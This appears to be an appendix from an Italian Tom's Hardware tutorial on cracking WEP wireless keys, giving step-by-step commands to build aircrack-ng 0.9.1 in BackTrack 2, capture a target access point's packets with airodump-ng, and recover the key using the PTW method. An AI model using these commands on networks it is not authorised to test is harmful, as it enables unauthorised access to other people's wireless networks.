Appendice 2: Utilizzare il chipset Ralink

Dicono che è facile, voi sareste capaci? In questo articolo vi spiegheremo passo per passo come rompere una chiave WEP.

Avatar di Tom's Hardware

a cura di Tom's Hardware

Appendice 1: Utilizzare PTW

Da quando è nato Backtrack, l'intero pacchetto aircrack-ng è stato ulteriormente potenziato con l'inserimento di qualche strumento più moderno . La modifica più importante è sicuramente l'aggiunta del metodo di rottura di chiavi WEP PTW, che necessita di molti meno IV per fare il suo dovere. Potete trovare i risultati dei nostri test qui.

Se volete usare il metodo PTW, avrete bisogno di scaricare ed installare l'ultimissima versione di aircrack-ng dal loro sito (al momento in cui scriviamo questo articolo, la versione più aggiornata è la 0.9.1)

Dopo esservi autenticati in BT2, digitate il seguente comando per scaricare ed installare aircrack-ng 0.9.1:

wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz

tar -zxvf aircrack-ng-0.9.1.tar.gz

cd aircrack-ng-0.9.1

make

make install

L'intero processo tarda meno di un minuto per completarsi. Fate attenzione perché dovrete ripetere questa procedura ogni volta che lancerete BT2, a meno che non installiate BT2 sul vostro hard disk.

Per usare PTW, avrete bisogno di catturare i pacchetti interi, invece che i soli IV; per questo dovrete omettere il parametro --ivs dalla riga di comando di airodump:

airodump-ng --channel [Canale AP] --bssid [BSSID AP] --write capturefile ath0

Dovrete anche aggiungere il parametro -z alla riga di comando di aircrack-ng che vedete nel tutorial, e assicuratevi di usare l'estensione .cap invece che .ivs per i file catturati. Per esempio:

aircrack-ng -z -b 00:06:25:B2:D4:19 capturefile*.cap